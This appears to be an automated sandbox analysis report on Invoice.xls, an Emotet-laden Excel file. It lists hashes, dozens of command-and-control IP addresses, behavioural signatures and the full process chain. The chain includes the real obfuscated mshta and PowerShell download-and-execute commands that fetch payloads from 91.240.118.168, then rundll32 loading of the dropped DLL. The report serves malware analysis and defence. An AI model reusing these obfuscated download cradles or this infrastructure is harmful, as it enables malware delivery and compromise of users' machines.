Analysis
-
max time kernel
160s -
max time network
195s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 03:20
Behavioral task
behavioral1
Sample
Invoice.xls
Resource
win7-en-20211208
General
-
Target
Invoice.xls
-
Size
47KB
-
MD5
3e4821e1a54cdd0b333933a730f0e769
-
SHA1
35a960b514e8b823a8af74c70323681105a04ccb
-
SHA256
f8ebf8cca5d8d600ab9f9d9e60b495f4776410c77c99e38d4777091b5d1f7c59
-
SHA512
0bee5ba3825f001370226013acc73f85e64f834faaa5368c7fa3ba8ea871a266e76b5f08fbbcace96579d556cf4b19c13dbdb224ade5378d0f83959e323df6a8
Malware Config
Extracted
http://91.240.118.168/vvv/ppp/fe.html
Extracted
http://91.240.118.168/vvv/ppp/fe.png
Extracted
emotet
Epoch4
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4808 4100 CMD.EXE EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 25 4908 mshta.exe 33 4524 powershell.exe 35 4524 powershell.exe 47 4360 rundll32.exe 49 4360 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 4288 rundll32.exe 3856 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5020 4908 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4100 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
WerFault.exepowershell.exerundll32.exepid process 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 5020 WerFault.exe 4524 powershell.exe 4524 powershell.exe 4524 powershell.exe 4360 rundll32.exe 4360 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WerFault.exepowershell.exedescription pid process Token: SeDebugPrivilege 5020 WerFault.exe Token: SeDebugPrivilege 4524 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE 4100 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 4100 wrote to memory of 4808 4100 EXCEL.EXE CMD.EXE PID 4100 wrote to memory of 4808 4100 EXCEL.EXE CMD.EXE PID 4808 wrote to memory of 4908 4808 CMD.EXE mshta.exe PID 4808 wrote to memory of 4908 4808 CMD.EXE mshta.exe PID 4908 wrote to memory of 4524 4908 mshta.exe powershell.exe PID 4908 wrote to memory of 4524 4908 mshta.exe powershell.exe PID 4524 wrote to memory of 4416 4524 powershell.exe cmd.exe PID 4524 wrote to memory of 4416 4524 powershell.exe cmd.exe PID 4416 wrote to memory of 4288 4416 cmd.exe rundll32.exe PID 4416 wrote to memory of 4288 4416 cmd.exe rundll32.exe PID 4416 wrote to memory of 4288 4416 cmd.exe rundll32.exe PID 4288 wrote to memory of 3856 4288 rundll32.exe rundll32.exe PID 4288 wrote to memory of 3856 4288 rundll32.exe rundll32.exe PID 4288 wrote to memory of 3856 4288 rundll32.exe rundll32.exe PID 3856 wrote to memory of 3120 3856 rundll32.exe rundll32.exe PID 3856 wrote to memory of 3120 3856 rundll32.exe rundll32.exe PID 3856 wrote to memory of 3120 3856 rundll32.exe rundll32.exe PID 3120 wrote to memory of 4360 3120 rundll32.exe rundll32.exe PID 3120 wrote to memory of 4360 3120 rundll32.exe rundll32.exe PID 3120 wrote to memory of 4360 3120 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://91.240.118.168/vvv/ppp/fe.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi",GyVCZQPGl8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Axopzyychh\tpndka.pbi",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4908 -s 16604⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QWER.dllMD5
4be9fda9a2fdb10c36a1ce820b676e7e
SHA1fd74db40bdbc55c29ec996f32d7b7332088f32b2
SHA256f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
SHA512878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed
-
\ProgramData\QWER.dllMD5
4be9fda9a2fdb10c36a1ce820b676e7e
SHA1fd74db40bdbc55c29ec996f32d7b7332088f32b2
SHA256f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
SHA512878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed
-
\ProgramData\QWER.dllMD5
4be9fda9a2fdb10c36a1ce820b676e7e
SHA1fd74db40bdbc55c29ec996f32d7b7332088f32b2
SHA256f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
SHA512878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed
-
memory/3856-339-0x0000000004860000-0x0000000004885000-memory.dmpFilesize
148KB
-
memory/3856-337-0x0000000004800000-0x0000000004825000-memory.dmpFilesize
148KB
-
memory/3856-335-0x00000000047A0000-0x00000000047C5000-memory.dmpFilesize
148KB
-
memory/3856-333-0x0000000004630000-0x0000000004655000-memory.dmpFilesize
148KB
-
memory/3856-328-0x0000000000250000-0x0000000000275000-memory.dmpFilesize
148KB
-
memory/3856-349-0x00000000049D0000-0x00000000049F5000-memory.dmpFilesize
148KB
-
memory/4100-385-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-386-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-115-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-387-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-388-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-129-0x00007FFBCBCE0000-0x00007FFBCBCF0000-memory.dmpFilesize
64KB
-
memory/4100-128-0x00007FFBCBCE0000-0x00007FFBCBCF0000-memory.dmpFilesize
64KB
-
memory/4100-121-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-118-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-117-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4100-116-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmpFilesize
64KB
-
memory/4288-325-0x00000000043F1000-0x0000000004412000-memory.dmpFilesize
132KB
-
memory/4360-359-0x0000000004A10000-0x0000000004A35000-memory.dmpFilesize
148KB
-
memory/4360-357-0x0000000004880000-0x00000000048A5000-memory.dmpFilesize
148KB
-
memory/4360-361-0x0000000004A70000-0x0000000004A95000-memory.dmpFilesize
148KB
-
memory/4360-363-0x0000000004AD0000-0x0000000004AF5000-memory.dmpFilesize
148KB
-
memory/4360-365-0x0000000004C50000-0x0000000004C75000-memory.dmpFilesize
148KB
-
memory/4360-367-0x0000000004CB0000-0x0000000004CD5000-memory.dmpFilesize
148KB
-
memory/4360-369-0x0000000004D30000-0x0000000004D55000-memory.dmpFilesize
148KB
-
memory/4524-318-0x000002A861310000-0x000002A879400000-memory.dmpFilesize
384.9MB
-
memory/4524-317-0x000002A861310000-0x000002A879400000-memory.dmpFilesize
384.9MB
-
memory/4524-310-0x000002A861310000-0x000002A879400000-memory.dmpFilesize
384.9MB
-
memory/4524-305-0x000002A879BF0000-0x000002A879C66000-memory.dmpFilesize
472KB
-
memory/4524-294-0x000002A879660000-0x000002A87969C000-memory.dmpFilesize
240KB
-
memory/4524-275-0x000002A8793C0000-0x000002A8793E2000-memory.dmpFilesize
136KB